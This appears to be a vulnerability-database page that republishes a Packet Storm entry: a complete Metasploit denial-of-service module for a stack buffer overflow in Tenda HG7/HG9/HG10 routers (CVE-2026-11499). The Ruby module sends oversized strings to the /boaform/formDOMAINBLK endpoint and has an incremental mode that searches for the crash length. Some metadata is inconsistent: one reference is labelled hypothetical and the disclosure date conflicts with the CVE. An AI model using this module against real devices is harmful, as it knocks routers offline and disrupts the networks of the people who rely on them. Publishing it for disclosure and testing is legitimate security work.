Lucene search
K

๐Ÿ“„ Tenda HG7 / HG9 / HG10 Buffer Overflow

๐Ÿ—“๏ธย 06 Jul 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 18ย Views

Metasploit DoS tests Tenda HG7/HG9/HG10 at /boaform/formDOMAINBLK with oversized blkDomain input.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-11499
8 Jun 202607:00
โ€“attackerkb
Circl
CVE-2026-11499
7 Jun 202613:51
โ€“circl
CNNVD
Tenda HG7 ็ผ“ๅ†ฒๅŒบ้”™่ฏฏๆผๆดž
8 Jun 202600:00
โ€“cnnvd
CVE
CVE-2026-11499
8 Jun 202607:00
โ€“cve
Cvelist
CVE-2026-11499 Tenda HG7HG9/HG10 formDOMAINBLK stack-based overflow
8 Jun 202607:00
โ€“cvelist
GithubExploit
Exploit for CVE-2026-11499
8 Jun 202610:54
โ€“githubexploit
EUVD
EUVD-2026-35029
8 Jun 202607:00
โ€“euvd
NVD
CVE-2026-11499
8 Jun 202609:16
โ€“nvd
Packet Storm
๐Ÿ“„ Tenda HG7 / HG9 / HG10 Buffer Overflow
6 Jul 202600:00
โ€“packetstorm
Packet Storm News
Tenda HG7 / HG9 / HG10 Management Interface Assessment Module
6 Jul 202600:00
โ€“packetstormnews
Rows per page
==================================================================================================================================
    | # Title     : Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow Metasploit DoS Module                                     |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.tendacn.com/material/show/105719                                                                     |
    ==================================================================================================================================
    
    [+] Summary    :  This module is a Metasploit auxiliary scanner/DoS module designed to test a stack-based buffer overflow condition affecting specific Tenda router models through the /boaform/formDOMAINBLK endpoint. 
                      The issue is associated with oversized input supplied to the blkDomain parameter, potentially causing service instability or device crashes.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report
      include Msf::Auxiliary::Dos
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow DoS',
            'Description' => %q{
              This module triggers a stack-based buffer overflow vulnerability in the
              /boaform/formDOMAINBLK endpoint of Tenda HG7, HG9, and HG10 routers.
              The vulnerability exists in the 'blkDomain' parameter.
              Sending an overly long string causes a crash and denial of service.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-11499'],
              ['URL', 'https://github.com/0xBlackash/CVE-2026-11499'] # Hypothetical
            ],
            'DisclosureDate' => '2024-01-15',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'SideEffects' => [DOS_MODULE],
              'Reliability' => []
            },
            'DefaultOptions' => {
              'RPORT' => 80,
              'SSL' => false
            }
          )
        )
    
        register_options([
          OptInt.new('PAYLOAD_LENGTH', [false, 'Length of the buffer overflow payload', 400]),
          OptBool.new('INCREMENTAL', [false, 'Incrementally increase payload size', false]),
          OptInt.new('STEP_SIZE', [false, 'Incremental step size', 50]),
          OptInt.new('START_LENGTH', [false, 'Starting length for incremental mode', 100]),
          OptInt.new('END_LENGTH', [false, 'Ending length for incremental mode', 1000]),
          OptInt.new('DELAY', [false, 'Delay between requests in incremental mode (seconds)', 2])
        ])
      end
    
      def run_host(ip)
        target_url = "http://#{ip}:#{rport}"
    
        if datastore['INCREMENTAL']
          print_status("Incremental mode - finding approximate crash offset...")
          start_len = datastore['START_LENGTH']
          end_len = datastore['END_LENGTH']
          step = datastore['STEP_SIZE']
          delay = datastore['DELAY']
    
          (start_len..end_len).step(step) do |length|
            print_status("Testing length: #{length}")
            send_payload(target_url, length)
            print_status("Waiting #{delay} seconds...")
            sleep(delay)
          end
        else
          send_payload(target_url, datastore['PAYLOAD_LENGTH'])
        end
    
        print_good("DoS attempt completed. Check if #{ip} is responsive.")
      end
    
      def send_payload(target_url, length)
        payload = 'A' * length
    
        data = {
          'blkDomain' => payload,
          'submit-url' => '/domainblk.asp',
          'page' => 'domainblk'
        }
    
        begin
          res = send_request_cgi({
            'method' => 'POST',
            'uri' => '/boaform/formDOMAINBLK',
            'vars_post' => data,
            'headers' => {
              'Referer' => "#{target_url}/domainblk.asp"
            }
          }, datastore['WfsDelay'])
    
          if res
            print_good("HTTP Status: #{res.code}")
            return true
          else
            print_status("No response (timeout/refused) - likely crashed")
            return true
          end
        rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Errno::ECONNRESET
          print_status("Connection error - crash successful!")
          return true
        rescue => e
          print_error("Error: #{e.message}")
          return false
        end
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2026 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 49.3
CVSS 3.19.8
CVSS 210
CVSS 39.8
EPSS0.06561
SSVC
18